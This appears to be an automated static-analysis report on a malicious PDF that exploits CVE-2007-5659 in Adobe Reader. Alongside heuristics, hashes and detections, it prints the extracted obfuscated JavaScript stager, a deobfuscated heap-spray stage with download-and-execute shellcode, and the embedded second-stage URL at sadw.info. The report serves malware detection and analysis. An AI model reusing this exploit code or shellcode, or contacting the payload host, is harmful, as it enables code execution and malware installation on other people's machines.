Malicious PDF — malware analysis report

Static analysis result for SHA-256 787ef7f83e0187c1…

MALICIOUS

PDF

16.7 KB
MD5: df119754173ca50b30fa4939ba37e4be SHA-1: 125ae626084fc26d097beabe04843e301c118eba SHA-256: 787ef7f83e0187c10d811cf4fa45a538a001be4857162304ac8c6bc5e9c5e7e1
406 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The sample is a PDF file that utilizes JavaScript to exploit CVE-2007-5659, specifically targeting Adobe Reader versions within a certain patch range. The JavaScript code is obfuscated and appears to be a dropper, as indicated by the embedded URL 'http://sadw.info/page/information.html/n00a102801r0007J11000601Re4e414f8Xd115e94bY74c2c202Z03003f36' which is likely used to download a second-stage payload. The presence of multiple JavaScript streams and exploit-related heuristics strongly suggests a malicious intent to execute arbitrary code.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 11

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER
    PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://sadw.info/page/information.html/n00a102801r0007J11000601Re4e414f8Xd115e94bY74c2c202Z03003f36 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 9 at offset 0x4049 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
annotation_subject_callee_hex_stage_000.js
4ed116846e84e4a867d530edd923e8a72307f92b506e5400a8579b493bf578d4		 deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x1A15 5217 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var B_Npn_a = new Array();var K5__UvJSU_Mwt = 0;var q2_5C_De45oY = "";function FX5__nik(Tej8dH4d2B8, wT13tJ){var I_SeX3 = wT13tJ.toString();var b3Bn___8_aV0g6n = "";for(var k_V6O_sXE = 0; k_V6O_sXE < I_SeX3.length; k_V6O_sXE++) {var kI8__8mjfSl_Io3 = parseInt(I_SeX3.substr(k_V6O_sXE, 1));if (!isNaN(kI8__8mjfSl_Io3)) {kI8__8mjfSl_Io3 = kI8__8mjfSl_Io3.toString(16);if (kI8__8mjfSl_Io3.length == 1) { kI8__8mjfSl_Io3 = "0" + kI8__8mjfSl_Io3; }else if (kI8__8mjfSl_Io3.length != 2) { kI8__8mjfSl_Io3 = "00"; }b3Bn___8_aV0g6n = kI8__8mjfSl_Io3 + b3Bn___8_aV0g6n;if (b3Bn___8_aV0g6n.length == 8) {break;}}}while(b3Bn___8_aV0g6n.length < 8) { b3Bn___8_aV0g6n = "0" + b3Bn___8_aV0g6n; }var bW_q_2urD_c = Tej8dH4d2B8.toString(16);if (bW_q_2urD_c.length == 1) { bW_q_2urD_c = "0" + bW_q_2urD_c; }else if (bW_q_2urD_c.length != 2) { bW_q_2urD_c = "00"; }b3Bn___8_aV0g6n = "3" + bW_q_2urD_c + "P" + b3Bn___8_aV0g6n;return b3Bn___8_aV0g6n;}function sOQY_8FQS_UTB_g(A_wV1_mk7i_D, NJ_1_7___5___ne){var Ne3o8l = new Array("");var X_64v5sm5b = A_wV1_mk7i_D;var f_HHU_8;if ((f_HHU_8 = A_wV1_mk7i_D.lastIndexOf("%u00")) != -1) {if (f_HHU_8 + 6 == A_wV1_mk7i_D.length) {Ne3o8l[0] = A_wV1_mk7i_D.substr(f_HHU_8 + 4, 2);X_64v5sm5b = A_wV1_mk7i_D.substring(0, f_HHU_8);}}f_HHU_8 = 1;for (k_V6O_sXE = 0; k_V6O_sXE < NJ_1_7___5___ne.length; k_V6O_sXE++) {var bwVmjDiuf = NJ_1_7___5___ne.charCodeAt(k_V6O_sXE).toString(16);if (bwVmjDiuf.length == 1) { bwVmjDiuf = "0" + bwVmjDiuf; }Ne3o8l[f_HHU_8] = bwVmjDiuf;f_HHU_8++;}k_V6O_sXE = Ne3o8l[0].length ? 0 : 1;Ne3o8l[f_HHU_8] = "00";Ne3o8l[f_HHU_8 + 1] = "00";f_HHU_8 += 2;if ((Ne3o8l.length - k_V6O_sXE) % 2) {Ne3o8l[f_HHU_8] = "00";}while(k_V6O_sXE < Ne3o8l.length) {X_64v5sm5b += "%u" + Ne3o8l[k_V6O_sXE + 1] + Ne3o8l[k_V6O_sXE];k_V6O_sXE += 2;}X_64v5sm5b += "%u0000";return X_64v5sm5b;}function Po6___43h_mu(auy_xi_Pp, B7D7YYS5SGW_T){while (auy_xi_Pp.length*2<B7D7YYS5SGW_T) {auy_xi_Pp += auy_xi_Pp;}auy_xi_Pp = auy_xi_Pp.substring(0,B7D7YYS5SGW_T/2);return auy_xi_Pp;}function j_SrX_7(TV__27y41b, q6XST181, B_kEi1){var O_71_g1T_m = 0x0c0c0c0c;var auy_xi_Pp = unescape(q6XST181);var NJ_1_7___5___ne = FX5__nik(TV__27y41b, B_kEi1);var q_qg_5140L8 = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var A_wV1_mk7i_D = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4d70%u4243%u4b6c%u4f44%u0044%u7468%u7074%u2f3a%u732f%u6461%u2e77%u6e69%u6f66%u702f%u6761%u2f65%u6e69%u6f66%u6d72%u7461%u6f69%u2e6e%u7468%u6c6d%u6e2f%u3030%u3161%u3230%u3038%u7231%u3030%u3730%u314a%u3031%u3030%u3036%u5231%u3465%u3465%u3431%u3866%u6458%u3131%u6535%u3439%u5962%u3437%u3263%u3263%u3230%u305a%u3033%u3330%u3366%u0036";app.C_MB_u_V___0R = unescape(sOQY_8FQS_UTB_g(A_wV1_mk7i_D, NJ_1_7___5___ne));var u4_Y_S_D = 0x400000;var TuYx_E0 = q_qg_5140L8.length * 2;var B7D7YYS5SGW_T = u4_Y_S_D - (TuYx_E0+0x38);auy_xi_Pp = Po6___43h_mu(auy_xi_Pp, B7D7YYS5SGW_T);var uvM_6Fjw = (O_71_g1T_m - 0x400000)/u4_Y_S_D;for (var E_k3X_em3__2Ykm = 0; E_k3X_em3__2Ykm < uvM_6Fjw; E_k3X_em3__2Ykm++) {B_Npn_a[E_k3X_em3__2Ykm] = auy_xi_Pp + q_qg_5140L8;}}function mYtt07a8D0Sk(){var a411R5US_RJr1uL = "";
... (truncated)
legacy_pdfkit_stage_000.js
a59c896f8c25ae3a6137adee0d75daadb0069e863818083300002348e6921701		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1A69 11622 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function C3S_V6_F(Q_Pp5D, eYh4Y_iHu){var T_SH_P6vM = new Array();var l_07AE = 512;var G_s_5_D731Tx = 21;var kp_7__a7XWW_1_n = 0;var tY6vIp5_bn_aVN = 0;var NMV7_h_5 = 0;var O4_j__tW0d = "";var WdcQLfl = "";var uC_EV_cu_DEx1aq = 6;try {var LV0_pw6jo = 0;if (app) {NMV7_h_5 = NMV7_h_5 + 2;eYh4Y_iHu = pr[LV0_pw6jo].subject;}} catch(e) { }NMV7_h_5 = NMV7_h_5 + 5;if (!Q_Pp5D) { T_SH_P6vM = new Array(106,197,47,85,82,11);} else {T_SH_P6vM = Q_Pp5D;}var wnFAo5XT_8eGIb = 0;var i2M_M__2D__Vpl = 0;var Ln_8vWY = 0;while(i2M_M__2D__Vpl < eYh4Y_iHu.length) {var Iv__5Udn_qE_1_5 = eYh4Y_iHu.substr(i2M_M__2D__Vpl, 2);var C_2iJ5Bl_8 = parseInt(Iv__5Udn_qE_1_5, 21);if (wnFAo5XT_8eGIb >= uC_EV_cu_DEx1aq) {wnFAo5XT_8eGIb = 0;}C_2iJ5Bl_8 -= T_SH_P6vM[wnFAo5XT_8eGIb] * (Ln_8vWY + 2);if (C_2iJ5Bl_8 < 0) {C_2iJ5Bl_8 -= Math.floor(C_2iJ5Bl_8 / 256) * (l_07AE / 2);}if (i2M_M__2D__Vpl >= 0) {C_2iJ5Bl_8 = String.fromCharCode(C_2iJ5Bl_8);}if (NMV7_h_5 == 6) {O4_j__tW0d += nHm167Hx;} else if (NMV7_h_5 == 7) {O4_j__tW0d += C_2iJ5Bl_8;} else {O4_j__tW0d += i2M_M__2D__Vpl;}wnFAo5XT_8eGIb++;i2M_M__2D__Vpl += 2;Ln_8vWY++;}var a_xmlNg8X = this;a_xmlNg8X['ev'+'al'](O4_j__tW0d);}
	C3S_V6_F(0, "3b88249c24847b4935062f8709834a0a2hba6b785j041k2hb60277020e5c6d777ac2ab0d064285c0943h8494878j6i42207dc28h906h6h0ib2bf5j04ae8825b73519392hc09h5d750i154kbj52a131784i9738060a48708d1j3f649c7ja1bd6h9958718d9fai4gc281bkaga607afbabg7h2g4j480fa97g3k949a2ha36f805b6h0cbc8f0ab9414db4781c1c8k6aaa6k47a43j55b052aa3gbe7ia63fb8a16j9h721c1c0a168da7308d6e0dbeahaab9306dai91072g8c13b1828c2f0j6j3e9da4637g55569489850c9g4b99832a7h604a9k816125498a7b3h917gab77885i081351816c27bg8f2fbi9i0k6601760h8i139b7b4h1a9821ak1a9j0671a63g6f855a8ib66h17014f8aah9b5j824e97ba070j6b935ea13759b28f849a63ab5k7f5j50713g440250409hbi0004804i125e5b087h4f50be293h7348a03ea42d5105a3bk574j5e1i422a0g7f7g077ia56c9455938g0k3b8d58b41780b3b97a9e523c4g0f4k6k8da50c247i8hba3c61054j4h009c470e43703h0kbb4j4h638b91666g6c3abj07c1806g462a97a35d4g1025c12a6i7dai8k6jafb264b1002485bg6fbk198713ac48802fb57ibh39719763453i5h7508191g4b67831h7c6i4d2d8d6613557i2b6f9a3994984839020356af5i4e2e6e2aa560164108a6115b399k2e28c321bba28c20c05bbe1g5684245b0272ad43563fbc7h1j993b1g7dah7j4e4g60911j3329904a7k56a9979h2378874i1c9i166d0484c20b275g4j426i284232867cbk0b10378c20b0453j25bk965f511c1e2h3fb974419b5691686c47bcb12d1k943da4bk8j98b312a6592k710a3g5f6e6bb4b10e4g0c20a92535780e94664d446660220a1h322h76827f5e2i22bh142d4e33113a4eb48938296j132j7fbgb96a3d2c7d2da5ah118gbi289b33673eai2e8a7093a0b7ba756b2i4a082569b406264d205f3b5c983d264e789e238b2j5gaf220d7k1f5c0g8i91aa073g421f1f7h10327c8gb2akbc22812k47ak271e0cb5292h1k071e1g7210bdbe7g6i1g4k0ea5b93c9g721i801b9e4j7j13915144305bb75g4h6j7b6g2039b22959bi0c372k9dbe010e1b39bd58b59e0c5f573g23063ab7c2004eb21e2a653a690817681kb06f078k5k7f8k7a0gb09c275c79c0a5077h06ae02a265a24c9c8h60683h4499bi6hc218a8bb0a731g695jbj9j2636a2b0119f17ag646a3hc13806bk2169b72014619a8883c13c8e4e6081a56f591fa3bhbgaf01aba2aib00h291k9fa16k3k879a1h8c7bah4b7h2j8f7k13a00j4b8b7f2a51ak68b96k8171634b8j5haa3g1760a44510799573ah1a603f55b1a43584a1058cai0ba42f71ak8dbi158j1j1787bc57008a32aga45j8b5j4j7da3b50ka72c8d7f245k824j977g57c13981957b8g5402a8956g8d0e6c899h313448008g9e456ia67f1f9g32a2481cb764070j0h0f068712104c892b9b0h420abi435a9k95789g4h88b20ga56085707g495k1g6a8b8b58ae7jaf655ia25h0f97586k0ca6a30b7j3h0f3a3c0h7h5i698h1j43861iaa4f8328852j1jbd3f6e7g23563c094c4ba78680585b4g9c7810176e4i90ak6ibhb87a751i3j5hb15k8h7d7da7aj3k687g1c71bd59782i8e1h3e79702k36bb3d476286997573701k833g187e4847058k9b6866bh3db53d9i7915647k11be4614bb085c1273c2398c43ak67b04b04a62d4171664441192h6k97b812523g623k4h9j703d7730b216635b788f45bh9a60380c035i7f665838703a005f426g977ga2232g9b4c451251bha29i2245560b2b447f41308g5384173c52bcah1j89724e99b2a1688f457e102jaj6g2g4k7fa98h863d70b53h378a2d310991c2ab4434483g79bk42437ba8310e4d3ab83gb64e24b92496543b31165f2ebj45159k4ja59c814b8cb43g389i41972a9cbe791h6e47156e9a376h868320aj357gb92c9hbh37752a8e3b3k3663422a9g502k4a6f6d7f6d2b2f95ak417e24403e7ab68b01c13ka7449i2ja6696g28a4330eaj0h9h0001c0396k4a1j2f794eab8dc3bh6aag2i724b1e940jaa2g5e274c1j2a6j3db43d448856851867a73h0k9821309k05749i
... (truncated)
deobfuscated.js
534ea528fd0c6b741800790a42e90f4702c37318ce5ebfa76562652167a6eaa2		 deobfuscated-js PDF JavaScript deobfuscation pass 134075 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 eval/decoder/string-building token(s). Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
3b88249c24847b4935062f8709834a0a2hba6b785j041k2hb60277020e5c6d777ac2ab0d064285c0943h8494878j6i42207dc28h906h6h0ib2bf5j04ae8825b73519392hc09h5d750i154kbj52a131784i9738060a48708d1j3f649c7ja1bd6h9958718d9fai4gc281bkaga607afbabg7h2g4j480fa97g3k949a2ha36f805b6h0cbc8f0ab9414db4781c1c8k6aaa6k47a43j55b052aa3gbe7ia63fb8a16j9h721c1c0a168da7308d6e0dbeahaab9306dai91072g8c13b1828c2f0j6j3e9da4637g55569489850c9g4b99832a7h604a9k816125498a7b3h917gab77885i081351816c27bg8f2fbi9i0k6601760h8i139b7b4h1a9821ak1a9j0671a63g6f855a8ib66h17014f8aah9b5j824e97ba070j6b935ea13759b28f849a63ab5k7f5j50713g440250409hbi0004804i125e5b087h4f50be293h7348a03ea42d5105a3bk574j5e1i422a0g7f7g077ia56c9455938g0k3b8d58b41780b3b97a9e523c4g0f4k6k8da50c247i8hba3c61054j4h009c470e43703h0kbb4j4h638b91666g6c3abj07c1806g462a97a35d4g1025c12a6i7dai8k6jafb264b1002485bg6fbk198713ac48802fb57ibh39719763453i5h7508191g4b67831h7c6i4d2d8d6613557i2b6f9a3994984839020356af5i4e2e6e2aa560164108a6115b399k2e28c321bba28c20c05bbe1g5684245b0272ad43563fbc7h1j993b1g7dah7j4e4g60911j3329904a7k56a9979h2378874i1c9i166d0484c20b275g4j426i284232867cbk0b10378c20b0453j25bk965f511c1e2h3fb974419b5691686c47bcb12d1k943da4bk8j98b312a6592k710a3g5f6e6bb4b10e4g0c20a92535780e94664d446660220a1h322h76827f5e2i22bh142d4e33113a4eb48938296j132j7fbgb96a3d2c7d2da5ah118gbi289b33673eai2e8a7093a0b7ba756b2i4a082569b406264d205f3b5c983d264e789e238b2j5gaf220d7k1f5c0g8i91aa073g421f1f7h10327c8gb2akbc22812k47ak271e0cb5292h1k071e1g7210bdbe7g6i1g4k0ea5b93c9g721i801b9e4j7j13915144305bb75g4h6j7b6g2039b22959bi0c372k9dbe010e1b39bd58b59e0c5f573g23063ab7c2004eb21e2a653a690817681kb06f078k5k7f8k7a0gb09c275c79c0a5077h06ae02a265a24c9c8h60683h4499bi6hc218a8bb0a731g695jbj9j2636a2b0119f17ag646a3hc13806bk2169b72014619a8883c13c8e4e6081a56f591fa3bhbgaf01aba2aib00h291k9fa16k3k879a1h8c7bah4b7h2j8f7k13a00j4b8b7f2a51ak68b96k8171634b8j5haa3g1760a44510799573ah1a603f55b1a43584a1058cai0ba42f71ak8dbi158j1j1787bc57008a32aga45j8b5j4j7da3b50ka72c8d7f245k824j977g57c13981957b8g5402a8956g8d0e6c899h313448008g9e456ia67f1f9g32a2481cb764070j0h0f068712104c892b9b0h420abi435a9k95789g4h88b20ga56085707g495k1g6a8b8b58ae7jaf655ia25h0f97586k0ca6a30b7j3h0f3a3c0h7h5i698h1j43861iaa4f8328852j1jbd3f6e7g23563c094c4ba78680585b4g9c7810176e4i90ak6ibhb87a751i3j5hb15k8h7d7da7aj3k687g1c71bd59782i8e1h3e79702k36bb3d476286997573701k833g187e4847058k9b6866bh3db53d9i7915647k11be4614bb085c1273c2398c43ak67b04b04a62d4171664441192h6k97b812523g623k4h9j703d7730b216635b788f45bh9a60380c035i7f665838703a005f426g977ga2232g9b4c451251bha29i2245560b2b447f41308g5384173c52bcah1j89724e99b2a1688f457e102jaj6g2g4k7fa98h863d70b53h378a2d310991c2ab4434483g79bk42437ba8310e4d3ab83gb64e24b92496543b31165f2ebj45159k4ja59c814b8cb43g389i41972a9cbe791h6e47156e9a376h868320aj357gb92c9hbh37752a8e3b3k3663422a9g502k4a6f6d7f6d2b2f95ak417e24403e7ab68b01c13ka7449i2ja6696g28a4330eaj0h9h0001c0396k4a1j2f794eab8dc3bh6aag2i724b1e940jaa2g5e274c1j2a6j3db43d448856851867a73h0k9821309k05749ibf4b215733b31b1f5ka3aia417b18c1767250j1c1e8k20381ca94d3k7k2a0eb45c781j322aahac339k560ka51485455ea17b4k12376e18745c907ga80k73b73h5i80b52abi5fb495aa2h452f6421af44808e3d19b823b704b10gagaibc5f4522acc25fbg2c480dbg8j7c8568bdb09iaa245f9h9kbi5c94719e6i2jb87ib4af718a6h1099955c92ac8e1kbk35093h4j309961470gaj4cbf519f7190248k080ibk3a4aaa294857a45283aj3c99445j04bja0342i86bcbc10b48ba6a8ah1k4h1kb07g6k4f8c9cc3c2a1ab5089347k8b11a01438aa7k3i2j7e3f78557d7k6g4gaj2gb2412185b44cb16ea48ga2152b4a24b6ae057i66959k6jac8241439h779b1094062d7i004g349j2e7e9i829a4j326b7485010a2c6k5f1889607c7a885329397d76618a8fad819143001a5i8c864j3b71088g6a272fb379258b306j4k5c019f2fa00i900h71a6013i882667a23i9d0k6e8g04a673aj4081a9a9a26d6595a31760b7aj8b9c74bk98b48i866d4g4aa0806d0c9793197j674g2a6e36914f81ba1j2g8b1770377b395f2b0ea12g58681a423h9f8b8c177fai7j594f01b9542kai7fb40dae83bb79ak4i4c659d4j7d657cc1ba6e81a41482166a78146b10506i7a622h0b586e4g8h5f484b3c4d003e248c6k3c189380a16a3e6a2165a7660k944kak82661g0c1e920d62b53655442963bk6d24b53766796b4g4f1k4b74bd0d0i3253702a6h89413a4d46194c8c6c739i39bj9i6e56160d7397632d4e683bc059486i0baf9b5e298k6c501c33b1c3b30e2h2hah4i356044298g7d95344f458d812f8d3b369i199c6i5c20a5524d2d
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.